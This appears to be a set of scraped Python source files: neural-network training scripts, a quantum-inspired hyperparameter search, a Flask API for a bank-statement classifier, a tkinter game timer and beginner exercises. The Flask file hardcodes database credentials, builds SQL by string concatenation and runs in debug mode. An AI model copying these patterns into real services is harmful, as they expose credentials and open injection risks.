= {'module':self.module,'data':data,'check_len':check_get_list_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if fail_code:\n raise GmdbError(fail_code)\n rnum = struct.unpack('>I', ret_data[1:5])[0]\n index = 5\n ret_dict = {}\n for i in xrange(0, rnum):\n keylen, vallen = struct.unpack('>II', 
ret_data[index:index+8])\n            ret_dict[ret_data[index+8:index+8+keylen]] = ret_data[index+8+keylen:index+8+keylen+vallen]\n            index += (8+keylen+vallen)\n        return ret_dict\n    \n    def add_int(self, key, num):\n        if isinstance(key, int) or isinstance(key, long):\n            key = struct.pack('=Q', key)\n        data = struct.pack('>BBII', MAGIC, 0x60, len(key), num) + key\n        req_dict = {'module':self.module,'data':data,'check_len':check_add_int_pkg_len}\n        ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n        ret_data = ret_dict['data']\n        fail_code = ord(ret_data[0:1])\n        if fail_code:\n            raise GmdbError(fail_code)\n        # struct.unpack returns a 1-tuple; index it so callers get the int\n        return struct.unpack('>I', ret_data[1:5])[0]\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"api/gmdb_api.py","file_name":"gmdb_api.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"7270350","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 22 21:41:44 2020\n\n@author: benny\n\"\"\"\n\nimport numpy as np\nimport sys\n\nf = open(sys.argv[1])\n\n#f = open('ion.train.0')\ndata = np.loadtxt(f)\ndata_s = data.copy()\ntrain = data[:,1:]\ntrainlabels = data[:,0]\n\nonearray = np.ones((train.shape[0],1))\ntrain = np.append(train,onearray,axis=1)\n\nmini_batch_size = 32\nmini_batch_array = np.random.randint(0,len(data),mini_batch_size)\n\ntrain_s = data_s[:mini_batch_size,1:]\nonearray = np.ones((train_s.shape[0],1))\ntrain_s = np.append(train_s,onearray,axis=1)\ntrainlabels_s = data_s[:mini_batch_size,0]\n\n#print(\"train=\",train)\n#print(\"train shape=\",train.shape)\n\nf = open(sys.argv[2])\n#f = open('ion.test.0')\ndata = np.loadtxt(f)\ntest = data[:,1:]\ntestlabels = data[:,0]\nonearray = np.ones((test.shape[0],1))\ntest = np.append(test,onearray,axis=1)\n\nrows = train.shape[0]\ncols = train.shape[1]\n\n\n\n\nif len(sys.argv)>3: \n    hidden_nodes = int(sys.argv[3])\nelse:\n    hidden_nodes=3\n\n#hidden_nodes=4\n#print(hidden_nodes)\n\nw = np.random.rand(hidden_nodes)\n#print(\"w=\",w)\n\nW = np.random.rand(hidden_nodes,cols)\n#print(\"w=\",W)\n\nepochs =10000\neta = 0.01\nprevobj = np.inf\nk = 0\n\n\n\n#calculate objective\nhidden_layer = np.matmul(train, np.transpose(W))\n#print(\"hidden_layer=\",hidden_layer)\n#print(\"hidden_layer shape=\",hidden_layer.shape)\n\nsigmoid = lambda x: 1/(1+np.exp(-x))\nhidden_layer = np.array([sigmoid(xi) for xi in hidden_layer])\n#print(\"hidden_layer = \",hidden_layer)\n#print(\"hidden_layer shape\", hidden_layer.shape)\nhidden_layer_fullDS = np.matmul(train, np.transpose(W))\nhidden_layer_fullDS = np.array([sigmoid(xi) for xi in hidden_layer_fullDS])\n\noutput_layer = np.matmul(hidden_layer_fullDS,np.transpose(w))\n#print(\"output_layer=\",output_layer)\n\nobj=np.sum(np.square(output_layer-trainlabels))\n#print(\"obj=\",obj)\n\n\nbest_w = np.random.rand(hidden_nodes)\nbest_W = np.random.rand(hidden_nodes, cols)\nbestobj = 100000\n\n#gradient descent begin\nstop=0\n#stop = 0.000001\n\nwhile(k < epochs):\n    #prevobj = obj\n    \n    #print(hidden_layer[0,:].shape,w.shape)\n    mini_batch_array = np.random.randint(0,train.shape[0],mini_batch_size)\n    w = best_w\n    W = best_W\n    dellw = 0\n    for j in range(0,mini_batch_size):\n        dellw += (np.dot(hidden_layer[mini_batch_array[j],:],np.transpose(w))-trainlabels[mini_batch_array[j]])*hidden_layer[mini_batch_array[j],:]\n\n    w = w - eta*dellw\n\n    #dellW=np.zeros(shape=(rows,hidden_nodes))\n    for i in range(hidden_nodes):\n        dell=0\n        for j in range(0,mini_batch_size):\n        \n            dell += 
np.sum(np.dot(hidden_layer[mini_batch_array[j],:],w)-trainlabels[mini_batch_array[j]])*w[i] * (hidden_layer[mini_batch_array[j],i])*(1-hidden_layer[mini_batch_array[j],i])*train[mini_batch_array[j]] \n # dellW[i] = dell\n W[i] = W[i]-eta*dell\n\n \n hidden_layer = np.matmul(train,np.transpose(W))\n \n hidden_layer = np.array([sigmoid(xi) for xi in hidden_layer])\n\n output_layer = (np.matmul(hidden_layer,np.transpose(w)))\n \n obj = np.sum(np.square(output_layer - trainlabels))\n if(obj < bestobj):\n bestobj = obj\n best_w = w\n best_W = W\n\n k= k+1\n #print(k, bestobj)\n\npredict_hidden_node = sigmoid(np.matmul(test,np.transpose(best_W)))\npredictions = np.sign(np.matmul(predict_hidden_node,np.transpose(best_w)))\n\nprint(predictions)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"single_layer_nn_SGD.py","file_name":"single_layer_nn_SGD.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"359788586","text":"import random\n\nfrom keras.datasets import cifar10, cifar100\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import EarlyStopping\n\nimport math\nimport numpy as np\n\n\n'''\nContains functions of Network inspired by the concepts of Quantum Mechanics:\n\tInitializes the network class without any hyper-parameter set\n\tOrthonormal basis states defining quantum states\n\tHadamard Gate for creation of super-position\n\tRandomize the values in Bloch Sphere\n\tGet the Quantum Population Vector\n\tMake the Qunatum Measurement\n\tInitializes network with randomly selected hyper-parameter\n'''\n\nclass qgaNetwork():\n\n\t'''\n Initializes the network class\n and it's features - number of networks, param, network, quantum population vectors and array size\n without any hyper-parameter set (param is set to none)\n '''\n\tdef __init__(self, numNetworks, numParam, param=None):\n\t\tself.numNetworks = numNetworks\n\t\tself.param = param\n\t\tself.network = {}\n\t\tself.numParam = numParam # num of parameters to optimize\n\t\tself.top_bottom = 3 # Array to get Quantum population vector\n\t\tself.qpv = np.empty([self.numNetworks, self.numParam, self.top_bottom])\n\t\tself.nqpv = np.empty([self.numNetworks, self.numParam, self.top_bottom])\n\n\n\t'''\n\tOrthonormal basis states or basis vectors - ket zero and ket one\n\tthe quantum state of a qubit can be represented as a linear superposition of its two basis vector states\n\n\tQubit zero => ket zero\n\t|0> = [1, 0]\n\n\tQubit one => ket one\n\t|1> = [0, 1]\n\t'''\n\tdef basisVectors(self):\n\t\tketZero = np.array([[1], [0]])\n\t\tketOne = np.array([[0], [1]])\n\t\treturn ketZero, ketOne\n\n\n\n\t'''\n\tHADAMARD GATE\n\t\ttakes in ket zero (|0>) or ket one (|1>) \n\t\tand gives ( |0> +/- |1> )/root(2)\n\t\tthereby creating superposition, that the output can take any value between 0/1 \n\t'''\n\tdef HadamardGate(self):\n\t\t# Hadamard gate\n\t\tr2=math.sqrt(2.0) \n\t\th=np.array([[1/r2, 1/r2],[1/r2,-1/r2]])\n\t\treturn h\n\n\n\n\t'''\n\tGet random theta value in the Bloch Sphere\n\t\treturns random theta in the Bloch sphere\n\t'''\n\tdef getRandomTheta(self):\n\t\ttheta = np.random.uniform(0,1)*90\n\t\ttheta = math.radians(theta)\n\t\ttheta = float(theta)\n\t\treturn theta\n\n\n\t'''\n\tGet the angles with which the basis vectors are to be rotated\n\tUses randomly generated theta\n\treturns the rotation angles \n\t'''\n\tdef getRotationAngles(self, theta):\n\t\ttheta 
= float(theta)\n\t\trot1=float(math.cos(theta)); rot2=-float(math.sin(theta));\n\t\trot3=float(math.sin(theta)); rot4=float(math.cos(theta));\n\t\treturn rot1, rot2, rot3, rot4\n\n\n\t'''\n\tGet the Quantum Population Vector\n\tHas the probabilistic details of all the networks and possibility of the hyper-parameters\n\t'''\n\tdef getPopulationVector(self, AlphaBeta, ketZero, ketOne, h, theta, rot):\n\n\t\t# Values for all the networks\n\t\tfor i in range(0, self.numNetworks):\n\n\t\t\t# Values for all the parameters in the network\n\t\t\tfor j in range(0, self.numParam):\n\n\t\t\t\t# Random rotation\n\t\t\t\ttheta = self.getRandomTheta()\n\t\t\t\trot1, rot2, rot3, rot4 = (self.getRotationAngles(theta))\n\t\t\t\tAlphaBeta[0] = rot1 * (h[0][0] * ketZero[0]) + rot2 * (h[0][1] * ketZero[1])\n\t\t\t\tAlphaBeta[1] = rot3 * (h[1][0] * ketOne[0]) + rot4 * (h[1][1] * ketOne[1])\n\n\t\t\t\t# Probability of getting 0\n\t\t\t\t# alpha squared\n\t\t\t\tself.qpv[i, j, 0] = np.around(2 * pow(AlphaBeta[0], 2), 2)\n\n\t\t\t\t# Probability of getting 1\n\t\t\t\t# beta squared\n\t\t\t\tself.qpv[i, j, 1] = 1 - self.qpv[i, j, 0]\n\n\t\t# Return Quantum Population Vector\n\t\treturn self.qpv\n\n\n\t'''\n\tMake the Measurement\n\t\tAny quantum state can be represented as a superposition of the eigenstates of an observable\n\t\tMeasurement results in the system being in the eigenstate corresponding to the eigenvalue result of the measurement\n\tEvery key of the parameters in hyper-parameter set is given a range\n\tIf there are 5 keys, the keys will have ranges: (0,0.2), (0.2+, 0.4), (0.4+, 0.6), (0.6+, 0.8), (0.8+, 1)\n\tA random real number is generated\n\tBased on it's proximity with the key's range, the keys are selected, and\n\tmeasurement is said to be done\n\t'''\n\tdef Measure(self, pv):\n\n\t\t# Re-Initialize the network\n\t\tself.network = {}\n\n\t\t# For all the networks\n\t\tfor i in range(self.numNetworks):\n\n\t\t\t# Initialize the network\n\t\t\tself.network[i] = {}\n\n\t\t\t# For all the keys of the parameters\n\t\t\tp = 0\n\t\t\tfor key in self.param:\n\n\t\t\t\t# get number of options in each parameter =>numParamLen\n\t\t\t\tnumParamLen = (len(self.param[key]))\n\n\t\t\t\t# Get a random value\n\t\t\t\trand = random.randint(0, 1)\n\n\t\t\t\tval = pv[i, p, rand]\n\n\t\t\t\t# For all the keys in parameters\n\t\t\t\tfor n in range(numParamLen):\n\t\t\t\t\tcomp1 = n / float(numParamLen)\n\t\t\t\t\tcomp2 = (n + 1) / float(numParamLen)\n\n\t\t\t\t\tif ((val >= comp1) & (val <= comp2)):\n\t\t\t\t\t\tself.network[i][key] = self.param[key][n+1]\n\t\t\t\tp=p+1\n\n\t\t# Return the network\n\t\treturn self.network\n\n\n\n\n\t'''\n Initializes network with randomly selected hyper-parameter\n Returns the network\n '''\n\tdef Init_population(self):\n\n\t\t# Get |0> and |1>\n\t\tketZero, ketOne = self.basisVectors()\n\n\t\t# Create an empty numpy array for the probability of 0/1 values\n\t\tAlphaBeta = np.empty([self.top_bottom])\n\n\t\t# Get Hadamard Gate operator\n\t\th = self.HadamardGate()\n\t\t\n\t\t# Rotation Q-gate\n\t\ttheta = 0\n\t\trot = np.empty([2,2])\n\n\t\t# Initial population array (individual x chromosome)\n\t\ti=0; j=0;\n\n\t\tself.qpv = self.getPopulationVector(AlphaBeta, ketZero, ketOne, h, theta, rot)\n\n\t\tself.network = self.Measure(self.qpv)\n\n\t\treturn self.qpv, self.network\n\n\n\n\n\n'''\nClass to get the accuracy of the networks\n'''\n\nearlyStopper = EarlyStopping( monitor='val_loss', min_delta=0.1, patience=5, verbose=0, mode='auto' )\n\n\nclass fitness():\n\t'''\n Initializes the 
fitness class\n and it's features - fitness, number of networks\n without any hyper-parameter set (param is set to none)\n '''\n\n\tdef __init__(self, numNetworks):\n\t\tself.numNetworks = numNetworks\n\t\tself.network = {}\n\t\tself.fitness = np.empty([self.numNetworks])\n\n\n\t'''\n Get number of classification classes in the dataset\n '''\n\tdef getnbClasses(self, dataset):\n\t\tif dataset == 'cifar10':\n\t\t\tnbClasses = 10\n\t\telif dataset == 'cifar100':\n\t\t\tnbClasses = 100\n\t\treturn nbClasses\n\n\n\n\n\t'''\n Get the details of the training and test dataset\t\n '''\n\tdef getData(self, dataset, nbClasses):\n\t\tif dataset == 'cifar10':\n\t\t\t(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\t\telif dataset == 'cifar100':\n\t\t\t(x_train, y_train), (x_test, y_test) = cifar100.load_data()\n\n\t\tx_train = x_train.reshape(50000, 3072)\n\t\tx_test = x_test.reshape(10000, 3072)\n\t\tx_train = x_train.astype('float32')\n\t\tx_test = x_test.astype('float32')\n\t\tx_train /= 255\n\t\tx_test /= 255\n\t\ty_train = to_categorical(y_train, nbClasses)\n\t\ty_test = to_categorical(y_test, nbClasses)\n\n\t\treturn x_train, y_train, x_test, y_test\n\n\n\n\n\t'''\n Train the dataset\n Returns the accuracy\n '''\n\tdef getFitness(self, net, genNum, dataset):\n\t\tself.fitness = {}\n\t\tself.network = {}\n\t\tself.network = net\n\n\t\ti = 0;\t\tj = 0;\n\n\t\t# set fitness for all the networks = 0\n\t\tfor i in range(0, self.numNetworks):\n\t\t\tself.fitness[i] = 0\n\n\n\t\t# evaluate fitness of all the networks\n\t\tfor i in range(self.numNetworks):\n\n\t\t\tbatchSize = 64\n\t\t\tinput_shape = (3072,)\n\n\t\t\t# Get number of classification classes\n\t\t\tnbClasses = self.getnbClasses(dataset)\n\n\t\t\t# Fetch details of the dataset\n\t\t\tx_train, y_train, x_test, y_test = self.getData(dataset, nbClasses)\n\n\n\t\t\t# Get details of the neural network to be designed\n\t\t\tactivation = self.network[i]['activation']\n\t\t\toptimizer = self.network[i]['optimizer']\n\t\t\tnbNeurons = self.network[i]['nbNeurons']\n\t\t\tnbLayers = self.network[i]['nbLayers']\n\t\t\tdropout = self.network[i]['dropout']\n\n\t\t\t# Initializes the model type to be trained\n\t\t\tmodel = Sequential()\n\n\t\t\t# Create the neural network\n\t\t\t# Add the layers in the neural network\n\t\t\tfor j in range(nbLayers):\n\t\t\t\tif j == 0:\n\t\t\t\t\tmodel.add(Dense(nbNeurons, activation=activation, input_shape=input_shape))\n\t\t\t\telse:\n\t\t\t\t\tmodel.add(Dense(nbNeurons, activation=activation))\n\t\t\t\tmodel.add(Dropout(dropout))\n\t\t\tmodel.add(Dense(nbClasses, activation='softmax'))\n\n\t\t\t# Compile the model\n\t\t\tmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n\t\t\t# Fit the model\n\t\t\tmodel.fit(x_train, y_train, batch_size=batchSize, epochs=1, verbose=0, validation_data=(x_test, y_test),\n\t\t\t\t\t callbacks=[earlyStopper])\n\n\t\t\t# Get the fitness of the model\n\t\t\t# Accuracy and Error\n\t\t\ty = model.evaluate(x_test, y_test, verbose=0)\n\n\t\t\tself.fitness[i] = y[1] * 100\n\n\n\t\t# Return the accuracy\n\n\t\treturn self.fitness\n\n\n\n\nclass compare():\n\t'''\n Initializes the fitness comparison class\n '''\n\n\tdef __init__(self, networkFitness):\n\t\tself.networkFitness = networkFitness\n\n\n\tdef networkData(self, numNetworks, fitnessParent, fitnessChild, QnetC, QnetP):\n\n\t\tfor n in range(numNetworks):\n\t\t\tif (self.networkFitness[n] < fitnessParent[n]) or (self.networkFitness[n] < fitnessChild[n]):\n\t\t\t\tif fitnessParent[n] > 
fitnessChild[n]:\n\t\t\t\t\tself.networkFitness[n] = fitnessParent[n]\n\t\t\t\telse:\n\t\t\t\t\tself.networkFitness[n] = fitnessChild[n]\n\t\t\t\t\tQnetP[n] = QnetC[n]\n\n\t\treturn self.networkFitness, QnetP\n\n\n\n\tdef BestAndPoorest(self):\n\n\t\tmaxIndex = max(self.networkFitness, key=self.networkFitness.get)\n\t\tminIndex = min(self.networkFitness, key=self.networkFitness.get)\n\n\t\treturn maxIndex, minIndex\n\n\n\t'''\n\tTo get the best fitness of the generation\t\n\tReturns the best fitness of the generation and the data\n\t'''\n\tdef genFitness(self, numNetworks, numParam, param, QnetParent):\n\n\t\t# Get the generation best fitness, if it's better then proceed\n\t\tmaxIndex, minIndex = self.BestAndPoorest()\n\n\n\t\t# The network with the worst fitness is deleted and reinitialized looking for better possibilities\n\t\t# The vector and the measured values for the network with minimum fitness are:\n\t\tcv, QnetNew = qgaNetwork(numNetworks, numParam, param).Init_population()\n\n\t\tQnetParent[minIndex] = QnetNew[minIndex]\n\n\t\treturn self.networkFitness[maxIndex], QnetParent\n\n","sub_path":"QEETO/Sequential/tenNetworks/qNetwork.py","file_name":"qNetwork.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"442048144","text":"import numpy as np\r\nimport pyodbc\r\nimport pandas as pd\r\n\r\nfrom sklearn.preprocessing import Imputer, FunctionTransformer\r\n\r\n#How to install xgboost 64bit - https://stackoverflow.com/a/45016496 , !pip install C:\\xgboost-0.6-cp36-cp36m-win_amd64.whl\r\n\r\n\r\nfrom flask import Flask\r\nfrom flask_restful import reqparse, abort, Api, Resource\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n\r\n\r\npd.set_option('display.max_columns', None)\r\npd.options.display.float_format = '{:.2f}'.format\r\n\r\n# for seaborn issue:\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nserver = 'xxxx'\r\ndatabase = 'LAB'\r\nuser = 'ploy'\r\npassword = '1234'\r\ncon = pyodbc.connect('DRIVER={SQL Server};SERVER=' + server + ';DATABASE=' + database + '; UID=' + user + '; PWD=' + password + '')\r\n\r\n#######\r\nimport tensorflow as tf\r\nimport numpy as np\r\n# import matplotlib.pyplot as plt\r\nimport src.scanner as scanner\r\nimport os\r\nimport csv\r\nimport src.util as util\r\nfrom datetime import datetime\r\nfrom operator import itemgetter\r\n\r\ndef normalize_account(account, bin_sizes):\r\n out = np.zeros((np.sum(bin_sizes)), dtype=np.float32)\r\n out[0] = util.normalize(account[0], open_stat)\r\n out[1 + account[1]] = 1\r\n out[1 + bin_sizes[1]] = util.normalize(account[2], recent_stat)\r\n out[2 + bin_sizes[1]] = util.normalize(account[3], dormant_stat)\r\n out[3 + bin_sizes[1] + account[4]] = 1\r\n\r\n return out\r\n\r\n\r\ndef normalize_transactions(trans):\r\n #print (trans)\r\n for i in range(len(trans)):\r\n trans[i][0] = util.normalize(trans[i][0], amount_stat)\r\n trans[i][1] = util.normalize(trans[i][1], date_stat)\r\n\r\n return trans\r\n\r\n\r\ndef batch_to_one_hot(array_like, bin_sizes):\r\n #print (\"array_like: \", array_like, \"-bin_sizes \", bin_sizes, \"-\\n\")\r\n out = np.zeros((len(array_like), np.sum(bin_sizes)), dtype=np.float32)\r\n for i in range(len(array_like)):\r\n last = 0\r\n for j in range(len(bin_sizes)):\r\n next_ = (last + bin_sizes[j])\r\n out[i, last:next_] = util.to_one_hot(array_like[i][j], bin_sizes[j])\r\n last = next_\r\n return out\r\n\r\n\r\ndef prep_data(tuples):\r\n #profiles = []\r\n trans = []\r\n 
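# Shape note (a sketch; util.normalize / util.to_one_hot are assumed,\r\n    # their code isn't in this file): each tuple is (transactions, label).\r\n    # normalize_transactions() rescales amount and date in place, then\r\n    # batch_to_one_hot() with bins [1, 1, len(operation_types)] lays each\r\n    # summarized transaction [amount, date, op_idx] out as\r\n    # [amount, date, one-hot(op_idx)] -- e.g. with 2 operation types,\r\n    # [0.3, -1.2, 1] -> [0.3, -1.2, 0.0, 1.0], assuming size-1 bins pass\r\n    # the scalar through unchanged.\r\n    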
labels = []\r\n\r\n for tuple in tuples:\r\n #profiles.append(normalize_account(tuple[0], [1, len(customer_types), 1, 1, len(units)]))\r\n trans.append(batch_to_one_hot(normalize_transactions(tuple[0]), [1, 1, len(operation_types)]))\r\n labels.append(1.0 if tuple[1] else 0)\r\n\r\n return (np.stack(trans), np.stack(labels))\r\n\r\ndef sort_transaction(transactions):\r\n return sorted(transactions, key=itemgetter(1))\r\n\r\n\r\ndef sequence_summarize(sorted_transactions):\r\n out = []\r\n temp = [0, 0, 0]\r\n for t in sorted_transactions:\r\n if t[1] == temp[1] and t[2] == temp[2]:\r\n temp[0] = temp[0] + t[0]\r\n else:\r\n out.append(temp)\r\n temp = [t[0], t[1], t[2]]\r\n out.append(temp)\r\n return out[1:]\r\n\r\nstime = datetime.utcfromtimestamp(0)\r\ndir_path = os.getcwd()\r\n\r\ncustomer_types = []\r\nunits = []\r\noperation_types = []\r\n\r\n\r\nopen_stat = util.get_start_stat()\r\nrecent_stat = util.get_start_stat()\r\ndormant_stat = util.get_start_stat()\r\n# freq_stat = util.get_start_stat()\r\n# interest_stat = util.get_start_stat()\r\n\r\namount_stat = util.get_start_stat()\r\ndate_stat = util.get_start_stat()\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom numpy import array\r\ndef lblEn (x):\r\n data = x\r\n values = array(data)\r\n label_encoder = LabelEncoder()\r\n integer_encoded = label_encoder.fit_transform(values)\r\n #print(label_encoder.classes_)\r\n #print(label_encoder.inverse_transform(label_encoder.classes_))\r\n #print (\"values: \", values)\r\n #print (\"encode: \", integer_encoded)\r\n return integer_encoded \r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\ndef stdScal (x):\r\n x = StandardScaler().fit_transform(x.reshape(-1, 1))\r\n return x\r\n\r\n\r\nfrom keras.preprocessing.sequence import pad_sequences\r\ndef seq_pad(x):\r\n padded = pad_sequences(x, dtype=float, padding='pre', maxlen=20)\r\n return padded\r\n\r\n####### Transform Data ######\r\ndef transformData(InquiryLogID):\r\n sql = \" SELECT * FROM InquiryLogStatement where InquiryLogID = '\" + str(InquiryLogID) + \"'\"\r\n df_main2 = pd.read_sql(sql, con)\r\n df_main2['TransactionDate'] = pd.to_datetime(df_main2['TransactionDate'], format='%d/%m/%Y %H:%M:%S')\r\n temp = pd.DataFrame({\r\n 'InquiryLogID': df_main2['InquiryLogID'],\r\n 'TransactionDate': df_main2['TransactionDate'],\r\n 'Withdrawal': df_main2['Withdrawal'],\r\n 'Deposit': df_main2['Deposit'],\r\n })\r\n\r\n temp['txn_type'] = temp['InquiryLogID']\r\n temp.fillna(0, inplace=True)\r\n temp['txn_type'] = temp['Withdrawal'].apply(lambda x: \"CR\" if x == 0 else \"DR\")\r\n\r\n temp['Amount'] = temp['Deposit']\r\n temp['Amount'] = None\r\n temp['Amount'] = temp.apply(lambda x: x['Deposit'] if x['Withdrawal'] == 0 else x['Withdrawal'], axis=1)\r\n temp['Amount'] = abs(temp['Amount'].apply(lambda x: str(x).replace(',', '')).astype(float))\r\n\r\n\r\n df_tran = temp = pd.DataFrame({\r\n 'account_no': temp['InquiryLogID'],\r\n 'from_to_account_no': 0,\r\n 'txn_amount': temp['Amount'],\r\n 'txn_dt': temp['TransactionDate'],\r\n 'txn_hour': 0,\r\n 'txn_type': temp['txn_type'],\r\n })\r\n \r\n a = df_tran['txn_dt']\r\n a = a.apply(lambda x: x.strftime('%Y-%m-%d %H:%M:%S'))\r\n \r\n from datetime import datetime\r\n stime = datetime.utcfromtimestamp(0)\r\n df_tran['txn_dt'] = a.apply(lambda y: (datetime.strptime(y, '%Y-%m-%d %H:%M:%S') - stime).total_seconds())\r\n\r\n df_tran['txn_type'] = lblEn(df_tran['txn_type'])\r\n \r\n df_tran['txn_amount'] = stdScal(df_tran['txn_amount'])\r\n df_tran['txn_dt'] = 
stdScal(df_tran['txn_dt'])\r\n #print(df_tran)\r\n account_transactions = {}\r\n #print(\"reading transaction file...\")\r\n arr_main = []\r\n for index, row in df_tran.iterrows():\r\n transaction = []\r\n # transaction.append(row[0]) # account id\r\n transaction.append(util.collect_statistics(amount_stat, row[2])) #amount\r\n transaction.append(util.collect_statistics(date_stat,(row[3])))\r\n transaction.append(util.check_and_update_list(operation_types, row[5])) # type\r\n \r\n if row[0] in account_transactions:\r\n account_transactions[row[0]].append(transaction)\r\n else:\r\n account_transactions[row[0]] = [transaction]\r\n\r\n #print(account_transactions, \"\\n\")\r\n transactions = sequence_summarize(sort_transaction(account_transactions[str(InquiryLogID)]))\r\n arr_main.append(transactions)\r\n #print(\"----------\\n\", arr_main, \"\\n--------\")\r\n #print(\"**\")\r\n \r\n \r\n dataset = seq_pad(arr_main)\r\n #dataset.shape\r\n return dataset\r\n\r\n\r\n#################### API ########################\r\n\r\n# MLP for Pima Indians Dataset Serialize to JSON and HDF5\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.models import model_from_json\r\n\r\nclass Noms(Resource):\r\n def post(self):\r\n parser = reqparse.RequestParser()\r\n parser.add_argument('id',type=int)\r\n args = parser.parse_args()\r\n \r\n id = args['id']\r\n data = searchById(id)\r\n\r\n # load json and create model\r\n json_file = open('nominee_model.json', 'r')\r\n loaded_model_json = json_file.read()\r\n json_file.close()\r\n loaded_model = model_from_json(loaded_model_json)\r\n \r\n # load weights into new model\r\n loaded_model.load_weights(\"nominee_model.h5\")\r\n predict = loaded_model.predict_classes(data)\r\n return str(predict)\r\n\r\n \r\n \r\ndef searchById(id):\r\n id = int(id)\r\n dataset = transformData(id)\r\n print(dataset)\r\n return dataset\r\n \r\n \r\n\r\napi.add_resource(Noms, '/noms')\r\n\r\n\r\n\r\n##\r\n## Actually setup the Api resource routing here\r\n##\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","sub_path":"Install/nomiee_acc_model_api.py","file_name":"nomiee_acc_model_api.py","file_ext":"py","file_size_in_byte":7959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"238732986","text":"import tkinter as tk\n\n\nclass StepTimer:\n \"\"\" Main view constructor\n view - main view object\n \"\"\"\n def __init__(self, main_view, update_freq=100):\n self.started = False\n self.update_freq = update_freq\n self.main_view = main_view\n\n self.timer = tk.Scale(\n self.main_view,\n from_=10,\n to=500,\n orient=tk.HORIZONTAL,\n length=self.main_view.game_manager.grid_length,\n showvalue=False,\n command=self.update_freq_changed\n )\n self.timer.set(update_freq)\n self.timer.grid(row=2, column=0, columnspan=5)\n\n \"\"\" Start timer \"\"\"\n def start(self):\n self.started = True\n self.main_view.button_manager.buttons['play'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['stop'].config(state=tk.ACTIVE)\n self.main_view.button_manager.buttons['next'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['generate'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['reset'].config(state=tk.DISABLED)\n\n self.main_view.after(self.update_freq, self.update)\n\n \"\"\" Update timer \"\"\"\n def update(self):\n self.main_view.button_manager.buttons['play'].config(state=tk.ACTIVE)\n 
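# Restore the idle button state (stop disabled, the rest enabled)\n        # before advancing the generation; while self.started is True the\n        # start() call at the bottom re-arms update() via tk's after(),\n        # so this method is the game-loop tick, firing roughly every\n        # self.update_freq milliseconds.\n        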
self.main_view.button_manager.buttons['stop'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['next'].config(state=tk.ACTIVE)\n self.main_view.button_manager.buttons['generate'].config(state=tk.ACTIVE)\n self.main_view.button_manager.buttons['reset'].config(state=tk.ACTIVE)\n\n self.main_view.game_manager.next_generation()\n self.main_view.square_manager.update_squares()\n\n if self.started:\n self.start()\n\n \"\"\" Stop timer \"\"\"\n def stop(self):\n self.started = False\n\n def update_freq_changed(self, value):\n self.update_freq = value\n","sub_path":"view/step_timer.py","file_name":"step_timer.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"136403047","text":"#111\na = input('알파벳을 1개 입력하시오:', )\nif a.islower() == 1:\n print(a.upper())\nelse:\n print(a.lower())\n\n#112\nb = int(input('score:', ))\nif 80 < b <= 100:\n print('grade is A')\nelif 60 < b < 81:\n print('grade is B')\nelif 40 < b < 61:\n print('grade is C')\nelif 20 < b < 41:\n print('grade is D')\nelif 0 <= b < 21:\n print('grade is E')\nelse:\n print('100점이 만점이다 ㅡㅡ')\n\n#113\nc = input('입력:').split()\namount = c[0]\ncurrency = c[1]\n\nif currency == '달러':\n rate = 1167\nelif currency == '엔':\n rate = 1.096\nelif currency == '유로':\n rate = 1268\nelif currency == '위안':\n rate = 171\nprint(float(rate)*float(amount), '원')\n\n#114\nd1 = int(input('input number1:'))\nd2 = int(input('input number2:'))\nd3 = int(input('input number3:'))\nprint(max(d1, d2, d3))\n\n#115\ne = input('휴대전화 번호 입력:').split('-')\nif e[0] == '011':\n f = 'SKT'\n print('당신은', f, '사용자입니다.')\nelif e[0] == '016':\n f = 'KT'\n print('당신은', f, '사용자입니다.')\nelif e[0] == '019':\n f = 'LGU'\n print('당신은', f, '사용자입니다.')\nelif e[0] == '010':\n f = '알수없는'\n print('당신은', f, '사용자입니다.')\n\n#116\ng = input('우편번호 5자리 입력:')\nif g[2] in '012':\n print('강북구')\nelif g[2] in '345':\n print('도봉구')\nelse:\n print('노원구')\n\n#117\nh = input('주민등록번호:')\nif h[7] in '13':\n print('남자')\nelif h[7] in '24':\n print('여자')\n\n#118\ni = input('주민등록번호:')\nif int(i[8:10]) <= 8:\n print('서울입니다.')\nelse:\n print('서울이 아닙니다.')\n\n#119\nj = input('주민등록번호: ')\nsum = int(j[0])*2 + int(j[1])*3 + int(j[2])*4 + int(j[3])*5 + int(j[4])*6 + int(j[5])*7 + int(j[7])*8 + int(j[8])*9 + int(j[9])*2 + int(j[10])*3 + int(j[11])*4 + int(j[12])*5\none = sum % 11\ntwo = 11 - one\nif two == int(j[13]):\n print('유효한 주민등록번호입니다.')\nelse:\n print('유효하지 않은 주민등록번호입니다.')\n","sub_path":"기본 300 